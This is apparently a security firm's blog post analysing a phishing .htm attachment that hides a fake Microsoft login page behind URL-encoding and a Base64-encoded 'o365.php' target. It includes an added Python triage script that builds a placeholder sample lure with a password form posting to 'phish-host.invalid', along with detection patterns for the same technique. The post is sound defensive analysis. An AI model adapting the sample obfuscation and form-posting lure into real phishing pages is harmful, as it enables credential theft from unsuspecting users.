This specific attack is interesting; attackers are constantly looking for new and creative ways to deliver their payloads. Their purposes in doing so are several:
An attempt to bypass security products
An attempt to bypass security training
An attempt to harvest credentials from unsuspecting users
Even though potential victims may have been trained to avoid opening documents, scripts, and executables from unknown senders, it is nowadays important to be careful with almost any file type.
Malicious file attachment:
To protect the privacy of the individual that received this file, all identifying information has either been redacted or obscured.
An executive received a suspicious email, which they were concerned had been sent by a threat actor. The email looked like an eFax message with a poorly worded .htm attachment. The attachment appeared to be a recycled lure of a voicemail attachment, as can be seen from the Play button and the 37 secs in the file description.
The initial phishing message was sent via an attached .htm file named “(redacted) ▶ ─────── 01mins37secs.htm”. The individual did not open the email, but sent a copy of the attachment for analysis. We were unable to obtain the email headers of the original email.
The first step was to attempt to de-obfuscate the code. I used an online tool from Coder’s Toolbox to perform this, with the settings for URL, Decode, and US-ASCII. This approach produced readable code:
I then used another online tool named js-beautify to clean up the code and make it more presentable:
Line 3: Contains the recipient of the phishing email
Line 4: Contains a Base64 encoded URL link to a php file
Line 6: Is a self-contained webpage that replicated a Microsoft Login page
Since this code contained a URI component, it was time to extract some more information. I used Mozilla’s developer tool decodeURI() by pasting in the portions between the script tags, and we got what was a prompt to enter our Microsoft password:
Using the Developer tools from Google Chrome and reloading the .htm page, we can gain some insightful information from the Headers. Here we can see a request to a URL that calls a file labeled “o365.php”.
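To make the de-obfuscation steps above repeatable without pasting the attachment into online tools, here is an added Python triage script. It is not code from the original post and not one of the tools the author used: it peels the percent-encoded layer that is handed to decodeURIComponent()/unescape(), recovers any Base64-hidden URL in the decoded script, and lists the indicators an analyst would want flagged (hidden content, an encoded URL, a password field, a plain-http submission target). The attachment it analyses is a constructed sample; the hostname phish-host.invalid and the recipient address in it are placeholders, with the o365.php path modeled on the case above.

```python
"""Static triage of an .htm email attachment that hides a credential-harvesting
page behind URL-encoding and Base64 (added example, not the original post's code)."""
import base64
import re
from urllib.parse import quote, unquote

# ---- Constructed sample attachment (placeholder values, not real indicators) ----
_POST_URL = "http://phish-host.invalid/o365.php"          # placeholder target
_B64_URL = base64.b64encode(_POST_URL.encode()).decode()  # how the lure hides it
_INNER_PAGE = f'''<script>
var rcpt = "victim@example.invalid";
var post = "{_B64_URL}";
document.write('<form method="POST" action="' + atob(post) + '">'
  + '<input type="password" name="passwd"></form>');
</script>'''
# Outer layer: the whole fake login page percent-encoded and fed to
# decodeURIComponent(), which defeats a naive keyword scan of the file.
SAMPLE_HTM = (
    '<html><body><script>document.write(decodeURIComponent("'
    + quote(_INNER_PAGE, safe="")
    + '"))</script></body></html>'
)

# ---- Analysis helpers -----------------------------------------------------------
_DECODE_CALL = re.compile(
    r'(?:decodeURIComponent|decodeURI|unescape)\(\s*["\']([^"\']+)["\']\s*\)'
)
_QUOTED_B64 = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
_EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
_PLAIN_URL = re.compile(r'https?://[^\s"\'<>]+')


def peel_layers(html: str, max_depth: int = 5) -> list:
    """Return successive decoded layers, outermost first. Each new layer is the
    percent-decoded string argument of a decode*/unescape call in the previous one."""
    layers = [html]
    for _ in range(max_depth):
        m = _DECODE_CALL.search(layers[-1])
        if not m:
            break
        layers.append(unquote(m.group(1)))
    return layers


def find_base64_urls(text: str) -> list:
    """Decode every quoted Base64-looking literal and keep those that are URLs."""
    found = []
    for m in _QUOTED_B64.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if decoded.startswith(("http://", "https://")):
            found.append(decoded)
    return found


def triage(html: str) -> dict:
    """Summarise what the attachment would do once the browser decodes it."""
    layers = peel_layers(html)
    final = layers[-1]
    b64_urls = find_base64_urls(final)
    urls = list(dict.fromkeys(b64_urls + _PLAIN_URL.findall(final)))
    password_field = bool(re.search(r'type=["\']password["\']', final, re.I))

    indicators = []
    if len(layers) > 1:
        indicators.append("content hidden behind decodeURIComponent/unescape")
    if b64_urls:
        indicators.append("Base64-encoded URL in script")
    if password_field:
        indicators.append("password input rendered by attachment")
    if any(u.startswith("http://") for u in urls):
        indicators.append("credentials would be submitted over plain http")

    return {
        "encoded_layers": len(layers) - 1,
        "recipients": list(dict.fromkeys(_EMAIL.findall(final))),
        "urls": urls,
        "password_field": password_field,
        "indicators": indicators,
        "verdict": "suspicious" if len(indicators) >= 2 else "clean",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTM).items():
        print(f"{key}: {value}")
```

Running the script on the constructed sample prints one encoded layer, the placeholder recipient, the decoded o365.php-style POST target, and a "suspicious" verdict; the recovered URLs are what you would submit to your threat-intelligence or URL-reputation checks before anyone in the organization opens the file.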
How was this possible?
Providers such as Google flag malicious websites when they present a risk to users in the form of malware. From what we can tell, this site has only been around for approximately 4 months and is not flagged as malicious by a few vendors.
How can you protect yourself?
Since spam and phishing emails can take a variety of forms, we suggest the following:
Never open emails and/or attachments from untrusted sources. If you have received an email that looks “out of the norm”, it is always better to report it to your IT support team or email provider
Never enter your credentials in a website that is missing the “https” at the beginning of the URL, e.g. “https[:]//login.microsoft.com” is the correct URL. The URL “http[:]//login.microssoft.com” is not
Block the spam email address
Delete the spam email message
Keep your device’s OS, software and anti-malware software up to date
Polito Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, red teaming engagements, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.